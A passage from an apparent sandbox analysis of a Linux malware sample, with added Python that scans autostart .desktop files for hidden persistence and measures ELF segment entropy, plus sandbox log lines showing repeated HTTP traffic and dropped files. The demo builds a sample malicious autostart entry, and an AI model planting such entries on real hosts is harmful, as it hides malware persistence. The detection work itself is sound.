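    """Return [(filename, program, reasons)] for suspicious .desktop files in dirpath."""
    findings = []
    if not os.path.isdir(dirpath):
        return findings
    for name in sorted(os.listdir(dirpath)):
        if not name.endswith(".desktop"):
            continue
        with open(os.path.join(dirpath, name), encoding="utf-8", errors="replace") as fh:
            entry = parse_desktop(fh.read())
        reasons = assess(entry)
        if reasons:
            findings.append((name, exec_program(entry.get("Exec", "")), reasons))
    return findings


def build_demo_dir():
    """Constructed autostart directory: one entry modelled on this report's
    gnome3.desktop -> /root/.gnome3/cron.elf (file contents assumed) and one benign entry."""
    d = tempfile.mkdtemp(prefix="autostart-demo-")
    samples = {
        "gnome3.desktop": "[Desktop Entry]\nType=Application\nName=gnome3\n"
                          "Exec=/root/.gnome3/cron.elf\nNoDisplay=true\nX-GNOME-Autostart-enabled=true\n",
        "nm-applet.desktop": "[Desktop Entry]\nType=Application\nName=Network\n"
                             "Exec=nm-applet\nOnlyShowIn=GNOME;\n",
    }
    for name, body in samples.items():
        with open(os.path.join(d, name), "w") as fh:
            fh.write(body)
    return d


if __name__ == "__main__":
    for hit in scan_autostart(build_demo_dir()):          # constructed demo entries
        print(hit)
    for d in autostart_dirs(os.path.expanduser("~")):    # then the live host
        for hit in scan_autostart(d):
            print(hit)
```

On the demo directory only gnome3.desktop is reported, with both the hidden-directory and NoDisplay reasons; the same scan over ~/.config/autostart and /etc/xdg/autostart on a suspect host surfaces entries of this shape regardless of what the binary is named.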

Hooking and other Techniques for Hiding and Protection

Source: unknown Network traffic detected: HTTP traffic on port 54556 -> 15124
Source: unknown Network traffic detected: HTTP traffic on port 54558 -> 15124
Source: unknown Network traffic detected: HTTP traffic on port 54560 -> 15124
Source: unknown Network traffic detected: HTTP traffic on port 54562 -> 15124
Source: unknown Network traffic detected: HTTP traffic on port 54564 -> 15124
Source: unknown Network traffic detected: HTTP traffic on port 54566 -> 15124
Source: unknown Network traffic detected: HTTP traffic on port 54568 -> 15124
Source: unknown Network traffic detected: HTTP traffic on port 54570 -> 15124
Source: unknown Network traffic detected: HTTP traffic on port 54572 -> 15124
Source: unknown Network traffic detected: HTTP traffic on port 54574 -> 15124
Source: unknown Network traffic detected: HTTP traffic on port 54576 -> 15124
Source: unknown Network traffic detected: HTTP traffic on port 54578 -> 15124
Source: unknown Network traffic detected: HTTP traffic on port 54580 -> 15124
Source: unknown Network traffic detected: HTTP traffic on port 54582 -> 15124
Source: unknown Network traffic detected: HTTP traffic on port 54584 -> 15124
Source: unknown Network traffic detected: HTTP traffic on port 54586 -> 15124
Source: unknown Network traffic detected: HTTP traffic on port 54588 -> 15124
Source: unknown Network traffic detected: HTTP traffic on port 54590 -> 15124
Source: unknown Network traffic detected: HTTP traffic on port 54592 -> 15124
Source: unknown Network traffic detected: HTTP traffic on port 54594 -> 15124
Source: unknown Network traffic detected: HTTP traffic on port 54596 -> 15124
Source: unknown Network traffic detected: HTTP traffic on port 54598 -> 15124
Source: unknown Network traffic detected: HTTP traffic on port 54600 -> 15124
Source: unknown Network traffic detected: HTTP traffic on port 54602 -> 15124
Source: _codecs_cn.so.12.dr Dropped file: segment LOAD with 7.4298 entropy (max. 8.0)
Source: /tmp/cron.elf (PID: 6242) Queries kernel information via 'uname'
Source: /sbin/ldconfig.real (PID: 6244) Queries kernel information via 'uname'
Source: /usr/bin/uname (PID: 6246) Queries kernel information via 'uname'
Source: /usr/bin/find (PID: 6370) Queries kernel information via 'uname'
Source: cacert.pem.12.dr Binary or memory string: zJVSk/BwJVmcIGfE7vmLV2H0knZ9P4SNVbfo5azV8fUZVqZa+5Acr5Pr5RzUZ5dd
Source: /bin/sh (PID: 6246) Uname executable: /usr/bin/uname -> uname -p
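The entropy signature above (a LOAD segment of the dropped _codecs_cn.so measured at 7.4298 bits per byte) is cheap to reproduce outside the sandbox: walk the ELF program headers and compute Shannon entropy over the file bytes (p_filesz) of each PT_LOAD segment. The script below is an added example and not the sandbox's own check; its 7.0-bit threshold is my assumption, chosen so that the reported 7.4298 would trigger it, and the ELF it builds for the demo is constructed (an ELF64 header plus two synthetic LOAD segments, not a runnable binary). It also handles ELF32 and big-endian headers, which the report does not discuss.

```python
"""Per-segment entropy of ELF PT_LOAD segments (added example, not the sandbox's check)."""
import math
import struct
from collections import Counter

PT_LOAD = 1


def shannon_entropy(buf):
    """Shannon entropy in bits per byte, 0.0 (constant) to 8.0 (uniform)."""
    n = len(buf)
    if n == 0:
        return 0.0
    h = -sum((c / n) * math.log2(c / n) for c in Counter(buf).values())
    return h or 0.0                 # normalise -0.0 for a single-valued buffer


def program_headers(data):
    """Yield program-header dicts for an ELF32 or ELF64 file of either endianness."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    ei_class, ei_data = data[4], data[5]
    end = {1: "<", 2: ">"}[ei_data]
    if ei_class == 2:                                   # ELF64 layout
        (e_phoff,) = struct.unpack_from(end + "Q", data, 32)
        e_phentsize, e_phnum = struct.unpack_from(end + "HH", data, 54)
        fmt = end + "IIQQQQQQ"
        names = ("p_type", "p_flags", "p_offset", "p_vaddr", "p_paddr", "p_filesz", "p_memsz", "p_align")
    elif ei_class == 1:                                 # ELF32 layout puts p_flags after p_memsz
        (e_phoff,) = struct.unpack_from(end + "I", data, 28)
        e_phentsize, e_phnum = struct.unpack_from(end + "HH", data, 42)
        fmt = end + "IIIIIIII"
        names = ("p_type", "p_offset", "p_vaddr", "p_paddr", "p_filesz", "p_memsz", "p_flags", "p_align")
    else:
        raise ValueError("unknown EI_CLASS %d" % ei_class)
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        if off + struct.calcsize(fmt) > len(data):
            raise ValueError("program header %d lies past end of file" % i)
        yield dict(zip(names, struct.unpack_from(fmt, data, off)))


def load_segment_entropies(data):
    """Entropy of the on-disk bytes (p_filesz) of every PT_LOAD segment."""
    out = []
    for i, ph in enumerate(program_headers(data)):
        if ph["p_type"] != PT_LOAD:
            continue
        start, size = ph["p_offset"], ph["p_filesz"]
        seg = data[start:start + size]
        if len(seg) != size:                            # truncated file or lying header
            raise ValueError("LOAD segment %d extends past end of file" % i)
        out.append({"index": i, "offset": start, "filesz": size,
                    "flags": ph["p_flags"], "entropy": round(shannon_entropy(seg), 4)})
    return out


def high_entropy_loads(data, threshold=7.0):
    """Segments above the threshold; 7.0 is an assumed cut-off, not the sandbox's."""
    return [s for s in load_segment_entropies(data) if s["entropy"] > threshold]


def build_demo_elf():
    """Constructed ELF64 little-endian image with two PT_LOAD segments: 4096 NOP bytes
    (entropy 0.0) and every byte value 16 times (entropy 8.0). Not executable."""
    seg_low = b"\x90" * 4096
    seg_high = bytes(range(256)) * 16
    ehdr_size, phdr_size, phnum = 64, 56, 2
    data_off = ehdr_size + phnum * phdr_size
    e_ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8   # 64-bit, little-endian, version 1
    ehdr = e_ident + struct.pack("<HHIQQQIHHHHHH",
                                 2, 62, 1, 0x400000,           # ET_EXEC, EM_X86_64, EV_CURRENT, e_entry
                                 ehdr_size, 0, 0,              # e_phoff, e_shoff, e_flags
                                 ehdr_size, phdr_size, phnum,  # e_ehsize, e_phentsize, e_phnum
                                 0, 0, 0)                      # no section headers

    def phdr(offset, size, vaddr, flags):
        return struct.pack("<IIQQQQQQ", PT_LOAD, flags, offset, vaddr, vaddr, size, size, 0x1000)

    phdrs = (phdr(data_off, len(seg_low), 0x400000 + data_off, 5)            # R+X
             + phdr(data_off + len(seg_low), len(seg_high), 0x600000, 6))     # R+W
    return ehdr + phdrs + seg_low + seg_high


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_demo_elf()
    for seg in load_segment_entropies(blob):
        print(seg)
    print("high-entropy LOAD segments:", len(high_entropy_loads(blob)))
```

Entropy near 8.0 in a LOAD segment usually means compressed or encrypted content, which is consistent with the PyInstaller-style bundle this sample unpacks into /tmp/_MEIcXSYvg; the same check on a packed loader versus its unpacked drop shows the difference directly.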